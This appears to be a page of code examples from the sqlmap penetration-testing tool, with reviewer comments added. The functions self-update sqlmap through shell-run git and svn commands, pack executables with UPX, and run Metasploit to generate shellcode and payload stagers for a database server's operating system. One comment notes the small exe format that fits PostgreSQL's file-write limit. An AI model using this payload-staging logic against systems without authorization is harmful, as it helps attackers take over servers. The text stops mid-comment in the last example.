Exemplo n.º 1
def update():
    """Self-update the sqlmap checkout through the 'git' command line client.

    Returns immediately unless conf.updateAll is set. Otherwise runs
    'git pull' through the shell, waits for it with pollProcess() and logs
    the outcome according to the process exit status.
    """
    if not conf.updateAll:
        return

    rootDir = paths.SQLMAP_ROOT_PATH

    logger.info("updating sqlmap to the latest development version from the "
                "GitHub repository")
    logger.debug("sqlmap will try to update itself using 'git' command")

    dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

    # NOTE(review): rootDir is interpolated unquoted into a shell=True command
    # line, so an install path containing spaces or shell metacharacters is
    # word-split/interpreted by the shell. It also lands in git's
    # <repository> argument position rather than selecting a working
    # directory. An argument list without a shell would avoid the former.
    gitCmd = "git pull %s" % rootDir
    process = execute(gitCmd, shell=True, stdout=PIPE, stderr=PIPE)
    pollProcess(process, True)
    stdout, stderr = process.communicate()

    # Success is judged by exit status only; nothing here verifies what was
    # fetched (e.g. a signed tag), so integrity rests on the configured
    # remote and transport.
    if process.returncode:
        logger.error("update could not be completed (%s)" % repr(stderr))

        if IS_WIN:
            infoMsg = ("for Windows platform it's recommended "
                       "to use a GitHub for Windows client for updating "
                       "purposes (http://windows.github.com/)")
        else:
            infoMsg = ("for Linux platform it's recommended "
                       "to use a standard 'git' package (e.g.: 'sudo apt-get install git')")

        logger.info(infoMsg)
    else:
        # NOTE(review): REVISION is not recomputed in this function, so the
        # value logged may predate the pull -- confirm where it is set.
        verb = "already at" if "Already" in stdout else "updated to"
        logger.info("%s the latest revision '%s'" % (verb, REVISION))
Exemplo n.º 2
    def pack(self, srcFile, dstFile=None):
        """Compress srcFile by running the prepared UPX command line.

        Returns os.path.getsize(srcFile) when neither failure branch below
        fires, otherwise None.
        """
        self.__initialize(srcFile, dstFile)

        logger.debug("executing local command: %s" % self.__upxCmd)

        # The command string is built elsewhere (by __initialize, presumably)
        # and handed to a shell; any file path embedded in it needs quoting
        # there.
        process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT)

        progressMsg = "\r[%s] [INFO] compression in progress " % time.strftime("%X")
        dataToStdout(progressMsg)
        pollProcess(process)
        upxStdout, upxStderr = process.communicate()

        # NOTE(review): inside a class body self.__upxTempExe is name-mangled,
        # while the string given to hasattr() is not, so this test looks up a
        # different attribute name than the one read on the next line. The
        # temporary executable is therefore likely never removed here.
        if hasattr(self, '__upxTempExe'):
            os.remove(self.__upxTempExe.name)

        msg = "failed to compress the file"

        if "NotCompressibleException" in upxStdout:
            msg += (" because you provided a Metasploit version above "
                    "3.3-dev revision 6681. This will not inficiate "
                    "the correct execution of sqlmap. It might "
                    "only slow down a bit the execution")
            logger.debug(msg)
            return None

        # NOTE(review): stderr was redirected into stdout above; if execute()
        # behaves like subprocess.Popen, upxStderr is always None and this
        # branch cannot fire -- the exit status is never consulted.
        if upxStderr:
            logger.warn(msg)
            return None

        return os.path.getsize(srcFile)
Exemplo n.º 3
    def pack(self, srcFile, dstFile=None):
        """Run the prepared UPX command on srcFile and report the result.

        Returns os.path.getsize(srcFile) when no failure branch is taken,
        otherwise None. Note that the size returned is that of srcFile, not
        of dstFile.
        """
        self.__initialize(srcFile, dstFile)

        logger.debug("executing local command: %s" % self.__upxCmd)
        # The command string is run through a shell; it is assembled outside
        # this method, so quoting of the file paths has to happen there.
        process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT)

        dataToStdout("\r[%s] [INFO] compression in progress " % time.strftime("%X"))
        pollProcess(process)
        upxStdout, upxStderr = process.communicate()

        # NOTE(review): the attribute access below is name-mangled by the
        # enclosing class, the string passed to hasattr() is not; the check
        # and the access refer to different names, so this cleanup probably
        # never runs and the temporary file stays on disk.
        if hasattr(self, '__upxTempExe'):
            os.remove(self.__upxTempExe.name)

        msg = "failed to compress the file"

        if "NotCompressibleException" in upxStdout:
            msg += " because you provided a Metasploit version above "
            msg += "3.3-dev revision 6681. This will not inficiate "
            msg += "the correct execution of sqlmap. It might "
            msg += "only slow down a bit the execution"
            logger.debug(msg)

        # NOTE(review): with stderr=STDOUT a Popen-style communicate() yields
        # None for stderr, so this branch looks unreachable -- confirm, and
        # consider testing process.returncode instead.
        elif upxStderr:
            logger.warn(msg)

        else:
            return os.path.getsize(srcFile)

        return None
Exemplo n.º 4
def __updateSqlmap():
    """Update the sqlmap working copy from its Subversion repository.

    Uses the pysvn bindings when they can be imported; on ImportError it
    falls back to running the 'svn' command line client through the shell.
    """
    rootDir = paths.SQLMAP_ROOT_PATH

    logger.info("updating sqlmap to latest development version from the "
                "subversion repository")

    try:
        import pysvn

        logger.debug("sqlmap will update itself using installed python-svn "
                     "third-party library, http://pysvn.tigris.org/")

        def notify(event_dict):
            # Progress callback handed to the pysvn client below.
            action = getUnicode(event_dict['action'])
            index = action.find('_')

            # One-character marker taken from just after the first underscore.
            if index != -1:
                prefix = action[index + 1].upper()
            else:
                prefix = action.capitalize()

            if '_update' in action:
                return

            if '_completed' in action:
                revision = getUnicode(event_dict['revision'])
                index = revision.find('number ')

                if index != -1:
                    revision = revision[index+7:].strip('>')

                logger.info('updated to the latest revision %s' % revision)
            else:
                dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))

        client = pysvn.Client()
        client.callback_notify = notify
        client.update(rootDir)
    except ImportError:
        logger.debug("sqlmap will try to update itself using 'svn' command")

        # NOTE(review): rootDir is placed unquoted in a shell=True command
        # line; a path with spaces or shell metacharacters is split or
        # interpreted by the shell. An argument list without a shell avoids
        # that.
        svnCmd = "svn update %s" % rootDir
        process = execute(svnCmd, shell=True, stdout=PIPE, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
        pollProcess(process)
        svnStdout, svnStderr = process.communicate()

        # Any stderr output is treated as failure; the exit status is not
        # inspected.
        if svnStderr:
            logger.error(svnStderr.strip())
        elif svnStdout:
            match = re.search("revision\s+([\d]+)", svnStdout, re.I)
            if match:
                logger.info('updated to the latest revision %s' % match.group(1))
Exemplo n.º 5
def update():
    """Self-update sqlmap by pulling GIT_REPOSITORY with the 'git' client.

    Returns immediately unless conf.updateAll is set. Refuses to run when
    the installation directory holds no '.git' entry. On success the
    REVISION value in lib.core.settings is refreshed from
    getRevisionNumber(); on any failure a platform-specific hint is logged.
    """
    if not conf.updateAll:
        return

    success = False
    rootDir = paths.SQLMAP_ROOT_PATH

    if os.path.exists(os.path.join(rootDir, ".git")):
        logger.info("updating sqlmap to the latest development version from the "
                    "GitHub repository")
        logger.debug("sqlmap will try to update itself using 'git' command")

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

        # NOTE(review): the '.git' check is made against rootDir, but the
        # command neither names rootDir nor passes a working directory, so
        # git presumably acts on the process's current directory -- confirm.
        # The fetched commits are not verified here; trust rests on the
        # GIT_REPOSITORY URL and its transport.
        gitCmd = "git pull %s HEAD" % GIT_REPOSITORY
        process = execute(gitCmd, shell=True, stdout=PIPE, stderr=PIPE)
        pollProcess(process, True)
        stdout, stderr = process.communicate()
        success = not process.returncode

        if success:
            import lib.core.settings

            revision = getRevisionNumber()
            lib.core.settings.REVISION = revision
            verb = "already at" if "Already" in stdout else "updated to"
            logger.info("%s the latest revision '%s'" % (verb, revision))
        else:
            # Runs of non-word characters in git's stderr are collapsed to
            # single spaces before the text is logged.
            cleaned = re.sub(r"\W+", " ", stderr).strip()
            logger.error("update could not be completed ('%s')" % cleaned)
    else:
        logger.error("not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
                     "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)")

    if not success:
        if IS_WIN:
            infoMsg = ("for Windows platform it's recommended "
                       "to use a GitHub for Windows client for updating "
                       "purposes (http://windows.github.com/) or just "
                       "download the latest snapshot from "
                       "https://github.com/sqlmapproject/sqlmap/downloads")
        else:
            infoMsg = ("for Linux platform it's required "
                       "to install a standard 'git' package (e.g.: 'sudo apt-get install git')")

        logger.info(infoMsg)
Exemplo n.º 6
    def createMsfShellcode(self, exitfunc, format, extra, encode):
        """Generate shellcode with the external Metasploit command and load it.

        The command built by _forgeMsfPayloadCmd() writes to a randomly named
        file under conf.outputPath; its stderr is parsed for the reported
        size. On success the file content is stored in self.shellcodeString
        and the file is deleted.

        Raises:
            SqlmapFilePathException: when no size can be parsed from stderr.
        """
        logger.info("creating Metasploit Framework multi-stage shellcode ")

        self._randStr = randomStr(lowercase=True)
        self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)

        self._initVars()
        self._prepareIngredients(encode=encode)
        self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)

        # The full command line is written to the debug log and then run
        # through a shell; it is assembled outside this method.
        logger.debug("executing local command: %s" % self._payloadCmd)
        process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
        pollProcess(process)
        payloadStderr = process.communicate()[1]

        # Two output formats are recognised, selected by target OS / options.
        if Backend.isOs(OS.WINDOWS) or extra == "BufferRegister=EAX":
            sizePattern = "size ([\d]+)"
        else:
            sizePattern = "Length\:\s([\d]+)"

        sizeMatch = re.search(sizePattern, payloadStderr, re.I)

        if not sizeMatch:
            # NOTE(review): the temporary file is not removed on this path.
            flattened = payloadStderr.replace("\n", " ").replace("\r", "")
            raise SqlmapFilePathException("failed to create the shellcode (%s)" % flattened)

        payloadSize = int(sizeMatch.group(1))

        if extra == "BufferRegister=EAX":
            payloadSize = payloadSize / 2

        logger.debug("the shellcode size is %d bytes" % payloadSize)

        self._shellcodeFP = codecs.open(self._shellcodeFilePath, "rb")
        self.shellcodeString = self._shellcodeFP.read()
        self._shellcodeFP.close()

        # The on-disk copy is removed once its content is held in memory.
        os.unlink(self._shellcodeFilePath)
Exemplo n.º 7
def update():
    """Self-update sqlmap by pulling GIT_REPOSITORY with the 'git' client.

    Does nothing unless conf.updateAll is set. Requires a '.git' entry in
    the installation directory; logs a platform-specific hint whenever the
    update did not succeed.
    """
    if not conf.updateAll:
        return

    success = False
    rootDir = paths.SQLMAP_ROOT_PATH

    # Only a git checkout can be updated this way.
    if not os.path.exists(os.path.join(rootDir, ".git")):
        errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
        errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)"
        logger.error(errMsg)
    else:
        infoMsg = "updating sqlmap to the latest development version from the "
        infoMsg += "GitHub repository"
        logger.info(infoMsg)

        debugMsg = "sqlmap will try to update itself using 'git' command"
        logger.debug(debugMsg)

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
        # NOTE(review): the command does not name rootDir and no working
        # directory is passed, so git presumably operates on the current
        # directory rather than the checked path -- confirm. Nothing here
        # verifies the fetched commits; trust rests on GIT_REPOSITORY.
        process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
        pollProcess(process, True)
        stdout, stderr = process.communicate()
        success = not process.returncode

        if success:
            # NOTE(review): REVISION is not refreshed in this function, so
            # the logged value may predate the pull -- confirm.
            logger.info(
                "%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION)
            )
        else:
            # Non-word character runs in stderr are collapsed to spaces
            # before logging.
            logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())

    if not success:
        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
            infoMsg += "to use a GitHub for Windows client for updating "
            infoMsg += "purposes (http://windows.github.com/) or just "
            infoMsg += "download the latest snapshot from "
            infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
        else:
            infoMsg = "for Linux platform it's required "
            infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"

        logger.info(infoMsg)
Exemplo n.º 8
    def createMsfShellcode(self, exitfunc, format, extra, encode):
        """Generate shellcode with the external Metasploit command and load it.

        Runs the command prepared by __forgeMsfPayloadCmd(), parses the
        reported size from its stderr, reads the generated file into
        self.shellcodeString and deletes the file. Raises
        sqlmapFilePathException when no size can be parsed.
        """
        infoMsg = "creating Metasploit Framework multi-stage shellcode "
        logger.info(infoMsg)

        # Randomly named scratch file under the output directory.
        self.__randStr = randomStr(lowercase=True)
        self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)

        self.__initVars()
        self.__prepareIngredients(encode=encode)
        self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)

        # The command line is logged at debug level and run through a shell;
        # it is assembled outside this method.
        logger.debug("executing local command: %s" % self.__payloadCmd)
        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
        pollProcess(process)
        payloadStderr = process.communicate()[1]

        # Two stderr formats are recognised, selected by target OS / options.
        if Backend.isOs(OS.WINDOWS) or extra == "BufferRegister=EAX":
            payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
        else:
            payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)

        if payloadSize:
            payloadSize = int(payloadSize.group(1))

            # Reported size is halved for this option.
            if extra == "BufferRegister=EAX":
                payloadSize = payloadSize / 2

            debugMsg = "the shellcode size is %d bytes" % payloadSize
            logger.debug(debugMsg)
        else:
            # NOTE(review): the scratch file is not removed on this path.
            errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
            raise sqlmapFilePathException, errMsg

        # NOTE(review): the handle is closed explicitly; an exception in
        # read() would skip both close() and the unlink below.
        self.__shellcodeFP = codecs.open(self.__shellcodeFilePath, "rb")
        self.shellcodeString = self.__shellcodeFP.read()
        self.__shellcodeFP.close()

        os.unlink(self.__shellcodeFilePath)
Exemplo n.º 9
    def createMsfShellcode(self, exitfunc, format, extra, encode):
        """Generate shellcode with the external Metasploit command and load it.

        The generated file lives under conf.outputPath with a random name; on
        success its content is stored in self.shellcodeString and the file is
        deleted.

        Raises:
            SqlmapFilePathException: when stderr carries none of the
                recognised size markers.
        """
        logger.info("creating Metasploit Framework multi-stage shellcode ")

        self._randStr = randomStr(lowercase=True)
        self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)

        Metasploit._initVars(self)
        self._prepareIngredients(encode=encode)
        self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)

        # The command line is logged at debug level and run through a shell;
        # it is assembled outside this method.
        logger.debug("executing local command: %s" % self._payloadCmd)
        process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
        pollProcess(process)
        payloadStderr = process.communicate()[1]

        sizeMatch = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr)

        if not sizeMatch:
            # NOTE(review): the temporary file is not removed on this path.
            flattened = payloadStderr.replace("\n", " ").replace("\r", "")
            raise SqlmapFilePathException("failed to create the shellcode (%s)" % flattened)

        payloadSize = int(sizeMatch.group(2))

        if extra == "BufferRegister=EAX":
            payloadSize = payloadSize / 2

        logger.debug("the shellcode size is %d bytes" % payloadSize)

        self._shellcodeFP = open(self._shellcodeFilePath, "rb")
        self.shellcodeString = self._shellcodeFP.read()
        self._shellcodeFP.close()

        # The on-disk copy is removed once its content is held in memory.
        os.unlink(self._shellcodeFilePath)
Exemplo n.º 10
def update():
    """Reject the --update switch with an explanatory exception.

    Returns silently unless conf.updateAll is set; otherwise always raises
    sqlmapUnsupportedFeatureException. The Subversion update code after the
    raise is unreachable while that raise is in place.
    """
    if not conf.updateAll:
        return

    errMsg = "sqlmap is now hosted on GitHub at https://github.com/sqlmapproject/sqlmap. "
    errMsg += "The --update switch is currently outdated and not working. Please, "
    errMsg += "update sqlmap running 'git pull' for the time being"
    raise sqlmapUnsupportedFeatureException, errMsg

    # --- Unreachable from here on: the raise above is unconditional. ---
    rootDir = paths.SQLMAP_ROOT_PATH

    infoMsg = "updating sqlmap to latest development version from the "
    infoMsg += "subversion repository"
    logger.info(infoMsg)

    try:
        import pysvn

        debugMsg = "sqlmap will update itself using installed python-svn "
        debugMsg += "third-party library, http://pysvn.tigris.org/"
        logger.debug(debugMsg)

        def notify(event_dict):
            # Progress callback for the pysvn client.
            action = getUnicode(event_dict["action"])
            index = action.find("_")
            prefix = action[index + 1].upper() if index != -1 else action.capitalize()

            if action.find("_update") != -1:
                return

            if action.find("_completed") == -1:
                dataToStdout("%s\t%s\n" % (prefix, event_dict["path"]))
            else:
                revision = getUnicode(event_dict["revision"], UNICODE_ENCODING)
                index = revision.find("number ")

                if index != -1:
                    revision = revision[index + 7 :].strip(">")

                logger.info("updated to the latest revision %s" % revision)

        client = pysvn.Client()
        client.callback_notify = notify

        try:
            client.update(rootDir)
        except pysvn.ClientError, e:
            errMsg = "unable to update sqlmap from subversion: '%s'. " % str(e)
            errMsg += "You are strongly advised to checkout "
            errMsg += "the clean copy from repository manually "
            if IS_WIN:
                errMsg += "(e.g. Right click -> TortoiseSVN -> Checkout... and type "
                errMsg += '"https://svn.sqlmap.org/sqlmap/trunk/sqlmap" into field "URL of repository")'
            else:
                errMsg += '(e.g. "svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev")'
            logger.error(errMsg)

    except ImportError, _:
        debugMsg = "sqlmap will try to update itself using 'svn' command"
        logger.debug(debugMsg)

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
        # NOTE(review): should this path ever be re-enabled, rootDir is
        # interpolated unquoted into a shell=True command line.
        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
        pollProcess(process)
        svnStdout, _ = process.communicate()

        if svnStdout:
            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)

            if revision:
                logger.info("updated to the latest revision %s" % revision.group(1))

        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
            infoMsg += "to use a TortoiseSVN GUI client for updating "
            infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
            logger.info(infoMsg)
Exemplo n.º 11
def update():
    """Update the sqlmap working copy from its Subversion repository.

    Returns immediately unless conf.updateAll is set. Uses the pysvn
    bindings when importable, otherwise runs the 'svn' command line client
    through the shell and reports its stderr or the parsed revision.
    """
    if not conf.updateAll:
        return

    rootDir = paths.SQLMAP_ROOT_PATH

    logger.info("updating sqlmap to latest development version from the "
                "subversion repository")

    try:
        import pysvn

        logger.debug("sqlmap will update itself using installed python-svn "
                     "third-party library, http://pysvn.tigris.org/")

        def notify(event_dict):
            # Progress callback handed to the pysvn client below.
            action = getUnicode(event_dict['action'])
            index = action.find('_')

            if index != -1:
                prefix = action[index + 1].upper()
            else:
                prefix = action.capitalize()

            if '_update' in action:
                return

            if '_completed' in action:
                revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
                index = revision.find('number ')

                if index != -1:
                    revision = revision[index + 7:].strip('>')

                logger.info('updated to the latest revision %s' % revision)
            else:
                dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))

        client = pysvn.Client()
        client.callback_notify = notify
        client.update(rootDir)

    except ImportError:
        logger.debug("sqlmap will try to update itself using 'svn' command")

        # NOTE(review): rootDir is placed unquoted in a shell=True command
        # line; a path with spaces or shell metacharacters is split or
        # interpreted by the shell.
        svnCmd = "svn update %s" % rootDir
        process = execute(svnCmd, shell=True, stdout=PIPE, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
        pollProcess(process)
        svnStdout, svnStderr = process.communicate()

        # Any stderr output counts as failure; the exit status is not read.
        if svnStderr:
            logger.error(getUnicode(svnStderr, system=True).strip())

            if IS_WIN:
                logger.info("for Windows platform it's recommended "
                            "to use a TortoiseSVN GUI client for updating "
                            "purposes (http://tortoisesvn.net/)")

        elif svnStdout:
            match = re.search("revision\s+([\d]+)", svnStdout, re.I)

            if match:
                logger.info('updated to the latest revision %s' % match.group(1))
Exemplo n.º 12
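    def createMsfPayloadStager(self, initialize=True):
        """Build the Metasploit payload stager executable under conf.outputPath.

        Args:
            initialize: when true, __initVars() is called before the command
                is forged and the log message reads "creating"; otherwise it
                reads "recreating".

        Raises:
            sqlmapFilePathException: when no payload size can be parsed from
                the generator's stderr output.
        """
        if initialize:
            infoMsg = ""
        else:
            infoMsg = "re"

        infoMsg += "creating Metasploit Framework 3 payload stager"

        logger.info(infoMsg)

        self.__randStr = randomStr(lowercase=True)

        if kb.os == "Windows":
            self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s.exe" % self.__randStr)

            # Metasploit developers added support for the old exe format
            # to msfencode using '-t exe-small' (>= 3.3.3-dev),
            # http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
            # This is useful for sqlmap because on PostgreSQL it is not
            # possible to write files bigger than 8192 bytes abusing the
            # lo_export() feature implemented in sqlmap.
            if Backend.getIdentifiedDbms() == DBMS.PGSQL:
                self.__fileFormat = "exe-small"
            else:
                self.__fileFormat = "exe"
        else:
            self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
            self.__fileFormat = "elf"

        if initialize:
            self.__initVars()

        if self.payloadStr is None:
            self.__prepareIngredients()

        self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)

        # The command line is logged at debug level and run through a shell;
        # it is assembled outside this method.
        logger.debug("executing local command: %s" % self.__payloadCmd)
        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)

        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
        pollProcess(process)
        payloadStderr = process.communicate()[1]

        if kb.os == "Windows":
            payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
        else:
            payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)

        if not payloadSize:
            # Report the generator's own error first. Previously os.chmod()
            # ran before this check, so a failed run that left no output file
            # surfaced as an OSError from chmod and hid this message.
            errMsg = "failed to create the payload stager (%s)" % payloadStderr
            raise sqlmapFilePathException(errMsg)

        # Owner-only read/write/execute on the generated file.
        os.chmod(self.exeFilePathLocal, stat.S_IRWXU)

        payloadSize = payloadSize.group(1)
        exeSize = os.path.getsize(self.exeFilePathLocal)

        # Only pack the payload stager if the back-end DBMS operating
        # system is Windows and new portable executable template is
        # used
        if self.__fileFormat == "exe":
            packedSize = upx.pack(self.exeFilePathLocal)
        else:
            packedSize = None

        debugMsg = "the encoded payload size is %s bytes, " % payloadSize

        if packedSize and packedSize < exeSize:
            debugMsg += "as a compressed portable executable its size "
            debugMsg += "is %d bytes, decompressed it " % packedSize
            debugMsg += "was %s bytes large" % exeSize
        else:
            debugMsg += "as a portable executable its size is "
            debugMsg += "%s bytes" % exeSize

        logger.debug(debugMsg)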
Exemplo n.º 13
def update():
    """Update the sqlmap working copy from its Subversion repository.

    Returns immediately unless conf.updateAll is set. Uses the pysvn
    bindings when importable and logs a manual-checkout hint if they fail;
    otherwise runs the 'svn' command line client through the shell.
    """
    if not conf.updateAll:
        return

    rootDir = paths.SQLMAP_ROOT_PATH

    logger.info("updating sqlmap to latest development version from the "
                "subversion repository")

    try:
        import pysvn

        logger.debug("sqlmap will update itself using installed python-svn "
                     "third-party library, http://pysvn.tigris.org/")

        def notify(event_dict):
            # Progress callback handed to the pysvn client below.
            action = getUnicode(event_dict['action'])
            index = action.find('_')

            if index != -1:
                prefix = action[index + 1].upper()
            else:
                prefix = action.capitalize()

            if '_update' in action:
                return

            if '_completed' in action:
                revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
                index = revision.find('number ')

                if index != -1:
                    revision = revision[index+7:].strip('>')

                logger.info('updated to the latest revision %s' % revision)
            else:
                dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))

        client = pysvn.Client()
        client.callback_notify = notify

        try:
            client.update(rootDir)
        except pysvn.ClientError, e:
            parts = [
                "unable to update sqlmap from subversion: '%s'. " % str(e),
                "You are strongly advised to checkout ",
                "the clean copy from repository manually ",
            ]

            if IS_WIN:
                parts.append("(e.g. Right click -> TortoiseSVN -> Checkout... and type ")
                parts.append("\"https://svn.sqlmap.org/sqlmap/trunk/sqlmap\" into field \"URL of repository\")")
            else:
                parts.append("(e.g. \"svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev\")")

            logger.error("".join(parts))

    except ImportError:
        logger.debug("sqlmap will try to update itself using 'svn' command")

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

        # NOTE(review): rootDir is placed unquoted in a shell=True command
        # line. stderr is not captured and the exit status is not read, so a
        # failed update is only visible as a missing "revision" log line.
        svnCmd = "svn update %s" % rootDir
        process = execute(svnCmd, shell=True, stdout=PIPE)
        pollProcess(process)
        svnStdout, _ = process.communicate()

        if svnStdout:
            match = re.search("revision\s+([\d]+)", svnStdout, re.I)

            if match:
                logger.info('updated to the latest revision %s' % match.group(1))

        if IS_WIN:
            logger.info("for Windows platform it's recommended "
                        "to use a TortoiseSVN GUI client for updating "
                        "purposes (http://tortoisesvn.net/downloads.html)")
Exemplo n.º 14
def update():
    """Reject the --update switch with an explanatory exception.

    Returns silently unless conf.updateAll is set; otherwise always raises
    sqlmapUnsupportedFeatureException. The Subversion update code after the
    raise is unreachable while that raise is in place.
    """
    if not conf.updateAll:
        return

    errMsg = "sqlmap is now hosted on GitHub at https://github.com/sqlmapproject/sqlmap. "
    errMsg += "The --update switch is currently outdated and not working. Please, "
    errMsg += "update sqlmap running 'git pull' for the time being"
    raise sqlmapUnsupportedFeatureException, errMsg

    # --- Unreachable from here on: the raise above is unconditional. ---
    rootDir = paths.SQLMAP_ROOT_PATH

    infoMsg = "updating sqlmap to latest development version from the "
    infoMsg += "subversion repository"
    logger.info(infoMsg)

    try:
        import pysvn

        debugMsg = "sqlmap will update itself using installed python-svn "
        debugMsg += "third-party library, http://pysvn.tigris.org/"
        logger.debug(debugMsg)

        def notify(event_dict):
            # Progress callback for the pysvn client.
            action = getUnicode(event_dict['action'])
            index = action.find('_')
            prefix = action[index + 1].upper() if index != -1 else action.capitalize()

            if action.find('_update') != -1:
                return

            if action.find('_completed') == -1:
                dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))
            else:
                revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
                index = revision.find('number ')

                if index != -1:
                    revision = revision[index+7:].strip('>')

                logger.info('updated to the latest revision %s' % revision)

        client = pysvn.Client()
        client.callback_notify = notify

        try:
            client.update(rootDir)
        except pysvn.ClientError, e:
            errMsg = "unable to update sqlmap from subversion: '%s'. " % str(e)
            errMsg += "You are strongly advised to checkout "
            errMsg += "the clean copy from repository manually "
            if IS_WIN:
                errMsg += "(e.g. Right click -> TortoiseSVN -> Checkout... and type "
                errMsg += "\"https://svn.sqlmap.org/sqlmap/trunk/sqlmap\" into field \"URL of repository\")"
            else:
                errMsg += "(e.g. \"svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev\")"
            logger.error(errMsg)

    except ImportError, _:
        debugMsg = "sqlmap will try to update itself using 'svn' command"
        logger.debug(debugMsg)

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
        # NOTE(review): should this path ever be re-enabled, rootDir is
        # interpolated unquoted into a shell=True command line.
        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
        pollProcess(process)
        svnStdout, _ = process.communicate()

        if svnStdout:
            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)

            if revision:
                logger.info('updated to the latest revision %s' % revision.group(1))

        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
            infoMsg += "to use a TortoiseSVN GUI client for updating "
            infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
            logger.info(infoMsg)
Exemplo n.º 15
    def createMsfPayloadStager(self, initialize=True):
        """Build the Metasploit payload stager executable under conf.outputPath.

        When initialize is true __initVars() is called first and the log
        message reads "creating"; otherwise it reads "recreating". Raises
        sqlmapFilePathException when no payload size can be parsed from the
        generator's stderr output.
        """
        if initialize:
            infoMsg = ""
        else:
            infoMsg = "re"

        infoMsg += "creating Metasploit Framework 3 payload stager"

        logger.info(infoMsg)

        self.__randStr = randomStr(lowercase=True)

        if kb.os == "Windows":
            self.exeFilePathLocal = os.path.join(conf.outputPath,
                                                 "tmpm%s.exe" % self.__randStr)

            # Metasploit developers added support for the old exe format
            # to msfencode using '-t exe-small' (>= 3.3.3-dev),
            # http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
            # This is useful for sqlmap because on PostgreSQL it is not
            # possible to write files bigger than 8192 bytes abusing the
            # lo_export() feature implemented in sqlmap.
            if Backend.getIdentifiedDbms() == DBMS.PGSQL:
                self.__fileFormat = "exe-small"
            else:
                self.__fileFormat = "exe"
        else:
            self.exeFilePathLocal = os.path.join(conf.outputPath,
                                                 "tmpm%s" % self.__randStr)
            self.__fileFormat = "elf"

        if initialize:
            self.__initVars()

        if self.payloadStr is None:
            self.__prepareIngredients()

        self.__forgeMsfPayloadCmd("process", self.__fileFormat,
                                  self.exeFilePathLocal)

        # The command line is logged at debug level and run through a shell;
        # it is assembled outside this method.
        logger.debug("executing local command: %s" % self.__payloadCmd)
        process = execute(self.__payloadCmd,
                          shell=True,
                          stdout=None,
                          stderr=PIPE)

        dataToStdout("\r[%s] [INFO] creation in progress " %
                     time.strftime("%X"))
        pollProcess(process)
        payloadStderr = process.communicate()[1]

        # Two stderr formats are recognised, selected by kb.os.
        if kb.os == "Windows":
            payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
        else:
            payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)

        # Owner-only read/write/execute on the generated file.
        # NOTE(review): this runs before the success check below; if the
        # generator failed and left no file, chmod presumably raises OSError
